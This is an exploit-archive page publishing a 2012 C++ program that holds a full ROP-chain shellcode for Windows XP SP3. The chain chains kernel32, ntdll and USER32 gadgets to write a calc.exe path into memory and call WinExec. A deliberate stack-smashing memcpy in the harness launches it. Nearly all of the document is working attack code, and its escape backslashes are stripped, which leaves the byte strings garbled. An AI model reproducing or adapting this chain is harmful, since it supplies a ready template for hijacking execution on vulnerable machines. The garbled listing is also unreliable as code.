[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Windows XP PRO SP3 - Full ROP calc shellcode
# Published : 2012-11-05
# Author :
# Previous Title : generic win32 - add new local administrator 326 bytes
# Next Title : Create a New User with UID 0 - ARM (Meta)
/*
Shellcode: Windows XP PRO SP3 - Full ROP calc shellcode
Author: b33f (http://www.fuzzysecurity.com/)
Notes: This is probably not the most efficient way but
I gave the dll's a run for their money ;))
Greets: Donato, Jahmel
OS-DLL's used:
Base | Top | Size | Version (Important!)
___________|____________|____________|_____________________________
0x7c800000 | 0x7c8f6000 | 0x000f6000 | 5.1.2600.5781 [kernel32.dll]
0x7c900000 | 0x7c9b2000 | 0x000b2000 | 5.1.2600.6055 [ntdll.dll]
0x7e410000 | 0x7e4a1000 | 0x00091000 | 5.1.2600.5512 [USER32.dll]
UINT WINAPI WinExec( => PTR to WinExec
__in LPCSTR lpCmdLine, => C:WINDOWSsystem32calc.exe+00000000
__in UINT uCmdShow => 0x1
);
*/
#include <iostream>
#include "windows.h"
char shellcode[]=
"xb1x4fx97x7c" // POP ECX # RETN
"xf9x10x47x7e" // Writable PTR USER32.dll
"x27xfax87x7c" // POP EDX # POP EAX # RETN
"x43x3ax5cx57" // ASCII "C:W"
"x49x4ex44x4f" // ASCII "INDO"
"x04x18x80x7c" // MOV DWORD PTR DS:[ECX],EDX # MOV DWORD PTR DS:[ECX+4],EAX # POP EBP # RETN 04
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"xe5x02x88x7c" // POP EAX # RETN
"x57x53x5cx73" // ASCII "WSs"
"x38xd6x46x7e" // MOV DWORD PTR DS:[ECX+8],EAX # POP ESI # POP EBP # RETN 08
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"xe5x02x88x7c" // POP EAX # RETN
"x79x73x74x65" // ASCII "yste"
"xcbxbex45x7e" // MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"xe5x02x88x7c" // POP EAX # RETN
"x63x61x6cx63" // ASCII "calc"
"x31xa9x91x7c" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x07x3dx96x7c" // INC ECX # RETN
"x07x3dx96x7c" // INC ECX # RETN
"x07x3dx96x7c" // INC ECX # RETN
"x07x3dx96x7c" // INC ECX # RETN
"xe5x02x88x7c" // POP EAX # RETN
"x6dx33x32x5c" // ASCII "m32"
"xcbxbex45x7e" // MOV DWORD PTR DS:[ECX+C],EAX # XOR EAX,EAX # INC EAX # POP ESI # POP EBP # RETN 08
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"xe5x02x88x7c" // POP EAX # RETN
"x2ex65x78x65" // ASCII ".exe"
"x31xa9x91x7c" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x07x3dx96x7c" // INC ECX # RETN
"x07x3dx96x7c" // INC ECX # RETN
"x07x3dx96x7c" // INC ECX # RETN
"x07x3dx96x7c" // INC ECX # RETN
"x9ex2ex92x7c" // XOR EAX,EAX # RETN
"x31xa9x91x7c" // MOV DWORD PTR DS:[ECX+14],EAX # MOV EAX,EDX # POP EBP # RETN 08
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"xeex4cx97x7c" // DEC ECX # RETN
"xeex4cx97x7c" // DEC ECX # RETN
"xeex4cx97x7c" // DEC ECX # RETN
"xeex4cx97x7c" // DEC ECX # RETN
"xeex4cx97x7c" // DEC ECX # RETN
"xeex4cx97x7c" // DEC ECX # RETN
"xeex4cx97x7c" // DEC ECX # RETN
"xeex4cx97x7c" // DEC ECX # RETN
//-------------------------------------------["C:WINDOWSsystem32calc.exe+00000000" -> ecx]-//
"xe5x02x88x7c" // POP EAX # RETN
"x7axebxc3x6f" // Should result in a valid PTR in kernel32.dll
"x4fxdax85x7c" // PUSH ESP # ADC BYTE PTR DS:[EAX+CC4837C],AL # XOR EAX,EAX # INC EAX # POP EDI # POP EBP # RETN 08
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x32xd9x44x7e" // XCHG EAX,EDI # RETN
"x62x28x97x7c" // ADD EAX,20 # POP EBP # RETN
"x8ax20x87x7c" // Compensate POP
"x62x28x97x7c" // ADD EAX,20 # POP EBP # RETN
"x8ax20x87x7c" // Compensate POP
"x62x28x97x7c" // ADD EAX,20 # POP EBP # RETN
"x8ax20x87x7c" // Compensate POP
"x62x28x97x7c" // ADD EAX,20 # POP EBP # RETN
"x8ax20x87x7c" // Compensate POP
//-----------------------------------------------------------[Save Stack Pointer + pivot eax]-//
"xd6xd1x95x7c" // MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x33x80x97x7c" // INC EAX # RETN
"x33x80x97x7c" // INC EAX # RETN
"x33x80x97x7c" // INC EAX # RETN
"x33x80x97x7c" // INC EAX # RETN
"xf5xd6x91x7c" // XOR ECX,ECX # RETN
"x07x3dx96x7c" // INC ECX # RETN
"xd6xd1x95x7c" // MOV DWORD PTR DS:[EAX+10],ECX # POP EBP # RETN 04
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"xb1x4fx97x7c" // POP ECX # RETN
"xedx2ax86x7c" // WinExec()
"xe7xc1x87x7c" // MOV DWORD PTR DS:[EAX+4],ECX # XOR EAX,EAX # POP EBP # RETN 04
"x8ax20x87x7c" // Compensate POP
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Compensate RETN
"x8ax20x87x7c" // Final RETN for WinExec()
"x8ax20x87x7c"; // Compensate WinExec()
//------------------------------------------------------[Write Arguments and execute -> calc]-//
void buff() {
char a;
memcpy((&a)+5, shellcode, sizeof(shellcode)); // Compiler dependent, works with Dev-C++ 4.9
}
int main()
{
LoadLibrary("USER32.dll"); // we need this dll
char buf[1024];
buff();
return 0;
}